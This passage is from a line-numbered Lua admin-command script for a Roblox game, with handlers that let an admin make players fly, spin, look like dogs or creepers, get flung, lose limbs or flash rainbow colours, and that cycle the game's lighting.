  4241. 1417.local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  4242.  
  4243.  
  4244. 1418.for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  4245.  
  4246.  
  4247. 1419.end
  4248.  
  4249.  
  4250. 1420.
  4251.  
  4252.  
  4253. 1421.if msg:lower():sub(1,4) == "fly " then
  4254.  
  4255.  
  4256. 1422.local plrz = GetPlr(plr, msg:lower():sub(5))
  4257.  
  4258.  
  4259. 1423.for i, v in pairs(plrz) do
  4260.  
  4261.  
  4262. 1424.coroutine.resume(coroutine.create(function()
  4263.  
  4264.  
  4265. 1425.if v and v:findFirstChild("PlayerGui") then
  4266.  
  4267.  
  4268. 1426.local cl = script.LocalScriptBase:Clone() cl.Name = "FlyScript" cl.Code.Value = [[repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game.Players.LocalPlayer:GetMouse() repeat wait() until mouse ~= nil local plr = game.Players.LocalPlayer local torso = plr.Character.Torso local flying = false local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 50 local speed = 0 function Fly() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "e" then if flying then flying = false else flying = true Fly() end elseif key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end)]]
  4269.  
  4270.  
  4271. 1427.cl.Parent = v.PlayerGui cl.Disabled = false
  4272.  
  4273.  
  4274. 1428.end
  4275.  
  4276.  
  4277. 1429.end))
  4278.  
  4279.  
  4280. 1430.end
  4281.  
  4282.  
  4283. 1431.end
  4284.  
  4285.  
  4286. 1432.
  4287.  
  4288.  
  4289. 1433.if msg:lower():sub(1,6) == "unfly " then
  4290.  
  4291.  
  4292. 1434.local plrz = GetPlr(plr, msg:lower():sub(7))
  4293.  
  4294.  
  4295. 1435.for i, v in pairs(plrz) do
  4296.  
  4297.  
  4298. 1436.coroutine.resume(coroutine.create(function()
  4299.  
  4300.  
  4301. 1437.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  4302.  
  4303.  
  4304. 1438.for a, q in pairs(v.PlayerGui:children()) do if q.Name == "FlyScript" then q:Destroy() end end
  4305.  
  4306.  
  4307. 1439.for a, q in pairs(v.Character.Torso:children()) do if q.Name == "BodyGyro" or q.Name == "BodyVelocity" then q:Destroy() end end
  4308.  
  4309.  
  4310. 1440.wait(.1) v.Character.Humanoid.PlatformStand = false
  4311.  
  4312.  
  4313. 1441.end
  4314.  
  4315.  
  4316. 1442.end))
  4317.  
  4318.  
  4319. 1443.end
  4320.  
  4321.  
  4322. 1444.end
  4323.  
  4324.  
  4325. 1445.
  4326.  
  4327.  
  4328. 1446.if msg:lower() == "disco" then
  4329.  
  4330.  
  4331. 1447.for i, v in pairs(lobjs) do v:Destroy() end
  4332.  
  4333.  
  4334. 1448.local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1) local color = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255)
  4335.  
  4336.  
  4337. 1449.game.Lighting.Ambient = color
  4338.  
  4339.  
  4340. 1450.game.Lighting.FogColor = color
  4341.  
  4342.  
  4343. 1451.until nil]]
  4344.  
  4345.  
  4346. 1452.table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  4347.  
  4348.  
  4349. 1453.end
  4350.  
  4351.  
  4352. 1454.
  4353.  
  4354.  
  4355. 1455.if msg:lower() == "flash" then
  4356.  
  4357.  
  4358. 1456.for i, v in pairs(lobjs) do v:Destroy() end
  4359.  
  4360.  
  4361. 1457.local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1)
  4362.  
  4363.  
  4364. 1458.game.Lighting.Ambient = Color3.new(1,1,1)
  4365.  
  4366.  
  4367. 1459.game.Lighting.FogColor = Color3.new(1,1,1)
  4368.  
  4369.  
  4370. 1460.game.Lighting.Brightness = 1
  4371.  
  4372.  
  4373. 1461.game.Lighting.TimeOfDay = 14
  4374.  
  4375.  
  4376. 1462.wait(.1)
  4377.  
  4378.  
  4379. 1463.game.Lighting.Ambient = Color3.new(0,0,0)
  4380.  
  4381.  
  4382. 1464.game.Lighting.FogColor = Color3.new(0,0,0)
  4383.  
  4384.  
  4385. 1465.game.Lighting.Brightness = 0
  4386.  
  4387.  
  4388. 1466.game.Lighting.TimeOfDay = 0
  4389.  
  4390.  
  4391. 1467.until nil]]
  4392.  
  4393.  
  4394. 1468.table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  4395.  
  4396.  
  4397. 1469.end
  4398.  
  4399.  
  4400. 1470.
  4401.  
  4402.  
  4403. 1471.if msg:lower():sub(1,5) == "spin " then
  4404.  
  4405.  
  4406. 1472.local plrz = GetPlr(plr, msg:lower():sub(6))
  4407.  
  4408.  
  4409. 1473.for i, v in pairs(plrz) do
  4410.  
  4411.  
  4412. 1474.coroutine.resume(coroutine.create(function()
  4413.  
  4414.  
  4415. 1475.if v and v.Character and v.Character:findFirstChild("Torso") then
  4416.  
  4417.  
  4418. 1476.for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  4419.  
  4420.  
  4421. 1477.local torso = v.Character:findFirstChild("Torso")
  4422.  
  4423.  
  4424. 1478.local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  4425.  
  4426.  
  4427. 1479.repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  4428.  
  4429.  
  4430. 1480.until not bg or bg.Parent ~= torso
  4431.  
  4432.  
  4433. 1481.end
  4434.  
  4435.  
  4436. 1482.end))
  4437.  
  4438.  
  4439. 1483.end
  4440.  
  4441.  
  4442. 1484.end
  4443.  
  4444.  
  4445. 1485.
  4446.  
  4447.  
  4448. 1486.if msg:lower():sub(1,7) == "unspin " then
  4449.  
  4450.  
  4451. 1487.local plrz = GetPlr(plr, msg:lower():sub(8))
  4452.  
  4453.  
  4454. 1488.for i, v in pairs(plrz) do
  4455.  
  4456.  
  4457. 1489.coroutine.resume(coroutine.create(function()
  4458.  
  4459.  
  4460. 1490.if v and v.Character and v.Character:findFirstChild("Torso") then
  4461.  
  4462.  
  4463. 1491.for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  4464.  
  4465.  
  4466. 1492.end
  4467.  
  4468.  
  4469. 1493.end))
  4470.  
  4471.  
  4472. 1494.end
  4473.  
  4474.  
  4475. 1495.end
  4476.  
  4477.  
  4478. 1496.
  4479.  
  4480.  
  4481. 1497.if msg:lower():sub(1,4) == "dog " then
  4482.  
  4483.  
  4484. 1498.local plrz = GetPlr(plr, msg:lower():sub(5))
  4485.  
  4486.  
  4487. 1499.for i, v in pairs(plrz) do
  4488.  
  4489.  
  4490. 1500.coroutine.resume(coroutine.create(function()
  4491.  
  4492.  
  4493. 1501.if v and v.Character and v.Character:findFirstChild("Torso") then
  4494.  
  4495.  
  4496. 1502.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  4497.  
  4498.  
  4499. 1503.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  4500.  
  4501.  
  4502. 1504.v.Character.Torso.Transparency = 1
  4503.  
  4504.  
  4505. 1505.v.Character.Torso.Neck.C0 = CFrame.new(0,-.5,-2) * CFrame.Angles(math.rad(90),math.rad(180),0)
  4506.  
  4507.  
  4508. 1506.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(90),0)
  4509.  
  4510.  
  4511. 1507.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(-90),0)
  4512.  
  4513.  
  4514. 1508.v.Character.Torso["Right Hip"].C0 = CFrame.new(1.5,-1,1.5) * CFrame.Angles(0,math.rad(90),0)
  4515.  
  4516.  
  4517. 1509.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1.5,-1,1.5) * CFrame.Angles(0,math.rad(-90),0)
  4518.  
  4519.  
  4520. 1510.local new = Instance.new("Seat", v.Character) new.Name = "FAKETORSO" new.formFactor = "Symmetric" new.TopSurface = 0 new.BottomSurface = 0 new.Size = Vector3.new(3,1,4) new.CFrame = v.Character.Torso.CFrame
  4521.  
  4522.  
  4523. 1511.local bf = Instance.new("BodyForce", new) bf.force = Vector3.new(0,new:GetMass()*196.25,0)
  4524.  
  4525.  
  4526. 1512.local weld = Instance.new("Weld", v.Character.Torso) weld.Part0 = v.Character.Torso weld.Part1 = new weld.C0 = CFrame.new(0,-.5,0)
  4527.  
  4528.  
  4529. 1513.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("Brown") elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Brown") end end
  4530.  
  4531.  
  4532. 1514.end
  4533.  
  4534.  
  4535. 1515.end))
  4536.  
  4537.  
  4538. 1516.end
  4539.  
  4540.  
  4541. 1517.end
  4542.  
  4543.  
  4544. 1518.
  4545.  
  4546.  
  4547. 1519.if msg:lower():sub(1,6) == "undog " then
  4548.  
  4549.  
  4550. 1520.local plrz = GetPlr(plr, msg:lower():sub(7))
  4551.  
  4552.  
  4553. 1521.for i, v in pairs(plrz) do
  4554.  
  4555.  
  4556. 1522.coroutine.resume(coroutine.create(function()
  4557.  
  4558.  
  4559. 1523.if v and v.Character and v.Character:findFirstChild("Torso") then
  4560.  
  4561.  
  4562. 1524.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  4563.  
  4564.  
  4565. 1525.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  4566.  
  4567.  
  4568. 1526.v.Character.Torso.Transparency = 0
  4569.  
  4570.  
  4571. 1527.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  4572.  
  4573.  
  4574. 1528.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  4575.  
  4576.  
  4577. 1529.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  4578.  
  4579.  
  4580. 1530.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  4581.  
  4582.  
  4583. 1531.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  4584.  
  4585.  
  4586. 1532.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("White") end end
  4587.  
  4588.  
  4589. 1533.end
  4590.  
  4591.  
  4592. 1534.end))
  4593.  
  4594.  
  4595. 1535.end
  4596.  
  4597.  
  4598. 1536.end
  4599.  
  4600.  
  4601. 1537.
  4602.  
  4603.  
  4604. 1538.if msg:lower():sub(1,8) == "creeper " then
  4605.  
  4606.  
  4607. 1539.local plrz = GetPlr(plr, msg:lower():sub(9))
  4608.  
  4609.  
  4610. 1540.for i, v in pairs(plrz) do
  4611.  
  4612.  
  4613. 1541.coroutine.resume(coroutine.create(function()
  4614.  
  4615.  
  4616. 1542.if v and v.Character and v.Character:findFirstChild("Torso") then
  4617.  
  4618.  
  4619. 1543.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  4620.  
  4621.  
  4622. 1544.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  4623.  
  4624.  
  4625. 1545.v.Character.Torso.Transparency = 0
  4626.  
  4627.  
  4628. 1546.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  4629.  
  4630.  
  4631. 1547.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(90),0)
  4632.  
  4633.  
  4634. 1548.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(-90),0)
  4635.  
  4636.  
  4637. 1549.v.Character.Torso["Right Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(90),0)
  4638.  
  4639.  
  4640. 1550.v.Character.Torso["Left Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(-90),0)
  4641.  
  4642.  
  4643. 1551.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("Bright green") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Bright green") end end
  4644.  
  4645.  
  4646. 1552.end
  4647.  
  4648.  
  4649. 1553.end))
  4650.  
  4651.  
  4652. 1554.end
  4653.  
  4654.  
  4655. 1555.end
  4656.  
  4657.  
  4658. 1556.
  4659.  
  4660.  
  4661. 1557.if msg:lower():sub(1,10) == "uncreeper " then
  4662.  
  4663.  
  4664. 1558.local plrz = GetPlr(plr, msg:lower():sub(11))
  4665.  
  4666.  
  4667. 1559.for i, v in pairs(plrz) do
  4668.  
  4669.  
  4670. 1560.coroutine.resume(coroutine.create(function()
  4671.  
  4672.  
  4673. 1561.if v and v.Character and v.Character:findFirstChild("Torso") then
  4674.  
  4675.  
  4676. 1562.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  4677.  
  4678.  
  4679. 1563.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  4680.  
  4681.  
  4682. 1564.v.Character.Torso.Transparency = 0
  4683.  
  4684.  
  4685. 1565.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  4686.  
  4687.  
  4688. 1566.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  4689.  
  4690.  
  4691. 1567.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  4692.  
  4693.  
  4694. 1568.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  4695.  
  4696.  
  4697. 1569.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  4698.  
  4699.  
  4700. 1570.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("White") end end
  4701.  
  4702.  
  4703. 1571.end
  4704.  
  4705.  
  4706. 1572.end))
  4707.  
  4708.  
  4709. 1573.end
  4710.  
  4711.  
  4712. 1574.end
  4713.  
  4714.  
  4715. 1575.
  4716.  
  4717.  
  4718. 1576.if msg:lower():sub(1,8) == "bighead " then
  4719.  
  4720.  
  4721. 1577.local plrz = GetPlr(plr, msg:lower():sub(9))
  4722.  
  4723.  
  4724. 1578.for i, v in pairs(plrz) do
  4725.  
  4726.  
  4727. 1579.coroutine.resume(coroutine.create(function()
  4728.  
  4729.  
  4730. 1580.if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  4731.  
  4732.  
  4733. 1581.end))
  4734.  
  4735.  
  4736. 1582.end
  4737.  
  4738.  
  4739. 1583.end
  4740.  
  4741.  
  4742. 1584.
  4743.  
  4744.  
  4745. 1585.if msg:lower():sub(1,9) == "minihead " then
  4746.  
  4747.  
  4748. 1586.local plrz = GetPlr(plr, msg:lower():sub(10))
  4749.  
  4750.  
  4751. 1587.for i, v in pairs(plrz) do
  4752.  
  4753.  
  4754. 1588.coroutine.resume(coroutine.create(function()
  4755.  
  4756.  
  4757. 1589.if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  4758.  
  4759.  
  4760. 1590.end))
  4761.  
  4762.  
  4763. 1591.end
  4764.  
  4765.  
  4766. 1592.end
  4767.  
  4768.  
  4769. 1593.
  4770.  
  4771.  
  4772. 1594.if msg:lower():sub(1,6) == "fling " then
  4773.  
  4774.  
  4775. 1595.local plrz = GetPlr(plr, msg:lower():sub(7))
  4776.  
  4777.  
  4778. 1596.for i, v in pairs(plrz) do
  4779.  
  4780.  
  4781. 1597.coroutine.resume(coroutine.create(function()
  4782.  
  4783.  
  4784. 1598.if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  4785.  
  4786.  
  4787. 1599.local xran local zran
  4788.  
  4789.  
  4790. 1600.repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  4791.  
  4792.  
  4793. 1601.repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  4794.  
  4795.  
  4796. 1602.v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  4797.  
  4798.  
  4799. 1603.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  4800.  
  4801.  
  4802. 1604.end
  4803.  
  4804.  
  4805. 1605.end))
  4806.  
  4807.  
  4808. 1606.end
  4809.  
  4810.  
  4811. 1607.end
  4812.  
  4813.  
  4814. 1608.
  4815.  
  4816.  
  4817. 1609.if msg:lower():sub(1,8) == "seizure " then
  4818.  
  4819.  
  4820. 1610.local plrz = GetPlr(plr, msg:lower():sub(9))
  4821.  
  4822.  
  4823. 1611.for i, v in pairs(plrz) do
  4824.  
  4825.  
  4826. 1612.coroutine.resume(coroutine.create(function()
  4827.  
  4828.  
  4829. 1613.if v and v.Character then
  4830.  
  4831.  
  4832. 1614.v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  4833.  
  4834.  
  4835. 1615.local cl = script.ScriptBase:Clone() cl.Name = "SeizureBase" cl.Code.Value = [[repeat wait() script.Parent.Humanoid.PlatformStand = true script.Parent.Torso.Velocity = Vector3.new(math.random(-10,10),-5,math.random(-10,10)) script.Parent.Torso.RotVelocity = Vector3.new(math.random(-5,5),math.random(-5,5),math.random(-5,5)) until nil]]
  4836.  
  4837.  
  4838. 1616.table.insert(objects, cl) cl.Parent = v.Character cl.Disabled = false
  4839.  
  4840.  
  4841. 1617.end
  4842.  
  4843.  
  4844. 1618.end))
  4845.  
  4846.  
  4847. 1619.end
  4848.  
  4849.  
  4850. 1620.end
  4851.  
  4852.  
  4853. 1621.
  4854.  
  4855.  
  4856. 1622.if msg:lower():sub(1,10) == "unseizure " then
  4857.  
  4858.  
  4859. 1623.local plrz = GetPlr(plr, msg:lower():sub(11))
  4860.  
  4861.  
  4862. 1624.for i, v in pairs(plrz) do
  4863.  
  4864.  
  4865. 1625.coroutine.resume(coroutine.create(function()
  4866.  
  4867.  
  4868. 1626.if v and v.Character then
  4869.  
  4870.  
  4871. 1627.for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  4872.  
  4873.  
  4874. 1628.wait(.1) v.Character.Humanoid.PlatformStand = false
  4875.  
  4876.  
  4877. 1629.end
  4878.  
  4879.  
  4880. 1630.end))
  4881.  
  4882.  
  4883. 1631.end
  4884.  
  4885.  
  4886. 1632.end
  4887.  
  4888.  
  4889. 1633.
  4890.  
  4891.  
  4892. 1634.if msg:lower():sub(1,12) == "removelimbs " then
  4893.  
  4894.  
  4895. 1635.local plrz = GetPlr(plr, msg:lower():sub(13))
  4896.  
  4897.  
  4898. 1636.for i, v in pairs(plrz) do
  4899.  
  4900.  
  4901. 1637.coroutine.resume(coroutine.create(function()
  4902.  
  4903.  
  4904. 1638.if v and v.Character then
  4905.  
  4906.  
  4907. 1639.for a, obj in pairs(v.Character:children()) do
  4908.  
  4909.  
  4910. 1640.if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  4911.  
  4912.  
  4913. 1641.end
  4914.  
  4915.  
  4916. 1642.end
  4917.  
  4918.  
  4919. 1643.end))
  4920.  
  4921.  
  4922. 1644.end
  4923.  
  4924.  
  4925. 1645.end
  4926.  
  4927.  
  4928. 1646.
  4929.  
  4930.  
  4931. 1647.if msg:lower():sub(1,5) == "name " then
  4932.  
  4933.  
  4934. 1648.local chk1 = msg:lower():sub(6):find(" ") + 5
  4935.  
  4936.  
  4937. 1649.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  4938.  
  4939.  
  4940. 1650.for i, v in pairs(plrz) do
  4941.  
  4942.  
  4943. 1651.coroutine.resume(coroutine.create(function()
  4944.  
  4945.  
  4946. 1652.if v and v.Character and v.Character:findFirstChild("Head") then
  4947.  
  4948.  
  4949. 1653.for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency = 0 mod:Destroy() end end
  4950.  
  4951.  
  4952. 1654.local char = v.Character
  4953.  
  4954.  
  4955. 1655.local mod = Instance.new("Model", char) mod.Name = msg:sub(chk1+1)
  4956.  
  4957.  
  4958. 1656.local cl = char.Head:Clone() cl.Parent = mod local hum = Instance.new("Humanoid", mod) hum.Name = "NameTag" hum.MaxHealth = 0 hum.Health = 0
  4959.  
  4960.  
  4961. 1657.local weld = Instance.new("Weld", cl) weld.Part0 = cl weld.Part1 = char.Head
  4962.  
  4963.  
  4964. 1658.char.Head.Transparency = 1
  4965.  
  4966.  
  4967. 1659.end
  4968.  
  4969.  
  4970. 1660.end))
  4971.  
  4972.  
  4973. 1661.end
  4974.  
  4975.  
  4976. 1662.end
  4977.  
  4978.  
  4979. 1663.
  4980.  
  4981.  
  4982. 1664.if msg:lower():sub(1,7) == "unname " then
  4983.  
  4984.  
  4985. 1665.local plrz = GetPlr(plr, msg:lower():sub(8))
  4986.  
  4987.  
  4988. 1666.for i, v in pairs(plrz) do
  4989.  
  4990.  
  4991. 1667.coroutine.resume(coroutine.create(function()
  4992.  
  4993.  
  4994. 1668.if v and v.Character and v.Character:findFirstChild("Head") then
  4995.  
  4996.  
  4997. 1669.for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency = 0 mod:Destroy() end end
  4998.  
  4999.  
  5000. 1670.end
  5001.  
  5002.  
  5003. 1671.end))
  5004.  
  5005.  
  5006. 1672.end
  5007.  
  5008.  
  5009. 1673.end
  5010.  
  5011.  
  5012. 1674.
  5013.  
  5014.  
  5015. 1675.if msg:lower():sub(1,5) == "char " then
  5016.  
  5017.  
  5018. 1676.local chk1 = msg:lower():sub(6):find(" ") + 5
  5019.  
  5020.  
  5021. 1677.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  5022.  
  5023.  
  5024. 1678.for i, v in pairs(plrz) do
  5025.  
  5026.  
  5027. 1679.coroutine.resume(coroutine.create(function()
  5028.  
  5029.  
  5030. 1680.if v and v.Character then
  5031.  
  5032.  
  5033. 1681.v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. msg:sub(chk1+1)
  5034.  
  5035.  
  5036. 1682.v:LoadCharacter()
  5037.  
  5038.  
  5039. 1683.end
  5040.  
  5041.  
  5042. 1684.end))
  5043.  
  5044.  
  5045. 1685.end
  5046.  
  5047.  
  5048. 1686.end
  5049.  
  5050.  
  5051. 1687.
  5052.  
  5053.  
  5054. 1688.if msg:lower():sub(1,7) == "unchar " then
  5055.  
  5056.  
  5057. 1689.local plrz = GetPlr(plr, msg:lower():sub(8))
  5058.  
  5059.  
  5060. 1690.for i, v in pairs(plrz) do
  5061.  
  5062.  
  5063. 1691.coroutine.resume(coroutine.create(function()
  5064.  
  5065.  
  5066. 1692.if v and v.Character then
  5067.  
  5068.  
  5069. 1693.v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  5070.  
  5071.  
  5072. 1694.v:LoadCharacter()
  5073.  
  5074.  
  5075. 1695.end
  5076.  
  5077.  
  5078. 1696.end))
  5079.  
  5080.  
  5081. 1697.end
  5082.  
  5083.  
  5084. 1698.end
  5085.  
  5086.  
  5087. 1699.
  5088.  
  5089.  
  5090. 1700.if msg:lower():sub(1,7) == "infect " then
  5091.  
  5092.  
  5093. 1701.local plrz = GetPlr(plr, msg:lower():sub(8))
  5094.  
  5095.  
  5096. 1702.for i, v in pairs(plrz) do
  5097.  
  5098.  
  5099. 1703.coroutine.resume(coroutine.create(function()
  5100.  
  5101.  
  5102. 1704.if v and v.Character then
  5103.  
  5104.  
  5105. 1705.Infect(v.Character)
  5106.  
  5107.  
  5108. 1706.end
  5109.  
  5110.  
  5111. 1707.end))
  5112.  
  5113.  
  5114. 1708.end
  5115.  
  5116.  
  5117. 1709.end
  5118.  
  5119.  
  5120. 1710.
  5121.  
  5122.  
  5123. 1711.if msg:lower():sub(1,11) == "rainbowify " then
  5124.  
  5125.  
  5126. 1712.local plrz = GetPlr(plr, msg:lower():sub(12))
  5127.  
  5128.  
  5129. 1713.for i, v in pairs(plrz) do
  5130.  
  5131.  
  5132. 1714.coroutine.resume(coroutine.create(function()
  5133.  
  5134.  
  5135. 1715.if v and v.Character and v.Character:findFirstChild("Torso") then
  5136.  
  5137.  
  5138. 1716.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5139.  
  5140.  
  5141. 1717.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5142.  
  5143.  
  5144. 1718.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5145.  
  5146.  
  5147. 1719.local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) local clr = BrickColor.random() for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = clr v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = clr v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  5148.  
  5149.  
  5150. 1720.cl.Parent = v.Character cl.Disabled = false
  5151.  
  5152.  
  5153. 1721.end
  5154.  
  5155.  
  5156. 1722.end))
  5157.  
  5158.  
  5159. 1723.end
  5160.  
  5161.  
  5162. 1724.end
  5163.  
